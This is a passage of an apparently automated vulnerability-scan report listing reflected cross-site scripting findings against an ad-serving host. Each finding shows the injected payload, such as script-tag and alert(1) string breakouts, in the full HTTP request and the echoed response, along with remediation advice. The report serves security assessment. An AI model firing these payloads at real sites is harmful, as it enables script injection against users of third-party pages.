Cache-Control: no-store
Content-Length: 7588
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:18:55 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
189501321;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=e4288"><script>alert(1)</script>b5a60ac0fab\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=e4288">
...[SNIP]...

2.672. http://redcated/CNT/iview/194067507/direct [wi.300;hi.250/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067507/direct

Issue detail

The value of the wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 690bc'-alert(1)-'1fc722ce122 was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067507/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=690bc'-alert(1)-'1fc722ce122 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7517
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:19:06 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
884968941.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=690bc'-alert(1)-'1fc722ce122');
}
else
{
_strContentCP91288884968941 = '<a target="_blank" href="http://clk.atdmt.com/go/194067507/direct;wi.300;hi.250;ai.189501321;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/cli
...[SNIP]...

2.673. http://redcated/CNT/iview/194067507/direct [wi.300;hi.250/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067507/direct

Issue detail

The value of the wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80f6a"-alert(1)-"0732889766f was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067507/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=80f6a"-alert(1)-"0732889766f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7513
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:19:01 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
884968941_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000708687/mnum=0000816028/cstr=76051508=_4ce929ff,8824652464,708687^816028^1^0,1_/xsxdata=$xsxdata/bnum=76051508/optn=64?trg=80f6a"-alert(1)-"0732889766f",
clickThruUrl: "http://clk.redcated/go/194067507/direct;wi.300;hi.250;ai.189501321;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.674. http://redcated/CNT/iview/194067513/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/194067513/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53d22'%3ba76e7d2175b was submitted in the REST URL parameter 4. This input was echoed as 53d22';a76e7d2175b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067513/direct53d22'%3ba76e7d2175b;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7550
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:18:15 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
<param name="movie" value="HTTP://ec.atdmt.com/ds/CJCNTCINGCP9/11_7_2010_ct_pt2/110710_22_UTV_THDVR_39_50B_TAG_300x250.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/194067513/direct53d22';a76e7d2175b;wi.300;hi.250;ai.189501321;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/194067513/direct53d22';a76e7d2175b;wi.300;hi.250;ai.189501321;ct.1/01" />
...[SNIP]...

2.675. http://redcated/CNT/iview/194067513/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067513/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78ef5"><script>alert(1)</script>ca9dfa4f1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/194067513/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=&78ef5"><script>alert(1)</script>ca9dfa4f1c=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7617
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:14:21 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
01321;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=&78ef5"><script>alert(1)</script>ca9dfa4f1c=1\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=&78ef5">
...[SNIP]...

2.676. http://redcated/CNT/iview/194067513/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067513/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f7ce'-alert(1)-'655c19d96b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067513/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=&8f7ce'-alert(1)-'655c19d96b8=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7544
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:15:24 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
68941.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=&8f7ce'-alert(1)-'655c19d96b8=1');
}
else
{
_strContentCP91288884968941 = '<a target="_blank" href="http://clk.atdmt.com/go/194067513/direct;wi.300;hi.250;ai.189501321;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/c
...[SNIP]...

2.677. http://redcated/CNT/iview/194067513/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067513/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4140"-alert(1)-"4d63a179e85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067513/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=&d4140"-alert(1)-"4d63a179e85=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7546
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:14:54 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
68941_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=&d4140"-alert(1)-"4d63a179e85=1",
clickThruUrl: "http://clk.redcated/go/194067513/direct;wi.300;hi.250;ai.189501321;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

2.678. http://redcated/CNT/iview/194067513/direct [wi.300;hi.250/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067513/direct

Issue detail

The value of the wi.300;hi.250/01?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4916d"><script>alert(1)</script>47487c3d275 was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/194067513/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=4916d"><script>alert(1)</script>47487c3d275 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7603
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:13:00 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
501321;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=4916d"><script>alert(1)</script>47487c3d275\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=4916d">
...[SNIP]...

2.679. http://redcated/CNT/iview/194067513/direct [wi.300;hi.250/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067513/direct

Issue detail

The value of the wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ef65"-alert(1)-"f305227967b was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067513/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=3ef65"-alert(1)-"f305227967b HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7531
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:13:32 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
968941_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=3ef65"-alert(1)-"f305227967b",
clickThruUrl: "http://clk.redcated/go/194067513/direct;wi.300;hi.250;ai.189501321;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.680. http://redcated/CNT/iview/194067513/direct [wi.300;hi.250/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/194067513/direct

Issue detail

The value of the wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f8b9'-alert(1)-'14ccc0ab52c was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/194067513/direct;wi.300;hi.250/01?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=7f8b9'-alert(1)-'14ccc0ab52c HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7528
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:14:05 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
968941.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000816042/cstr=35977140=_4ce9272c,0207415177,782102^816042^1183^0,1_/xsxdata=$xsxdata/bnum=35977140/optn=64?trg=7f8b9'-alert(1)-'14ccc0ab52c');
}
else
{
_strContentCP91288884968941 = '<a target="_blank" href="http://clk.atdmt.com/go/194067513/direct;wi.300;hi.250;ai.189501321;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/cli
...[SNIP]...

2.681. http://redcated/CNT/iview/244975246/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/244975246/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d39db'%3b478b99a41c9 was submitted in the REST URL parameter 4. This input was echoed as d39db';478b99a41c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/244975246/directd39db'%3b478b99a41c9;wi.300;hi.250/01/3612368145?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8255
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:21:06 GMT

<html><head><title>Packages_FreePhone_300x250_110910</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCIN/Packages_FreePhone_110910/Packages_FreePhone_300x250_110910.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/244975246/directd39db';478b99a41c9;wi.300;hi.250;ai.190201933;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/244975246/directd39db';478b99a41c9;wi.300;hi.250;ai.190201933;ct.1/01" />
...[SNIP]...

2.682. http://redcated/CNT/iview/244975246/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/244975246/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3dd3'-alert(1)-'bf60fd185f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/244975246/direct;wi.300;hi.250/01/3612368145?click=http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=&e3dd3'-alert(1)-'bf60fd185f2=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8248
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:20:59 GMT

<html><head><title>FreePhone_Ornament_300x250_111510</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px
...[SNIP]...
22752.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000782102/mnum=0000873573/cstr=49593843=_4ce92ab4,3612368145,782102^873573^1183^0,1_/xsxdata=$XSXDATA/bnum=49593843/optn=64?trg=&e3dd3'-alert(1)-'bf60fd185f2=1');
}
else
{
_strContentCIN1289856122752 = '<a target="_blank" href="http://clk.atdmt.com/go/244975246/direct;wi.300;hi.250;ai.191166081;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/c
...[SNIP]...

2.683. http://redcated/CNT/iview/244975246/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/244975246/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 299a7"-alert(1)-"0ecfcb197b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

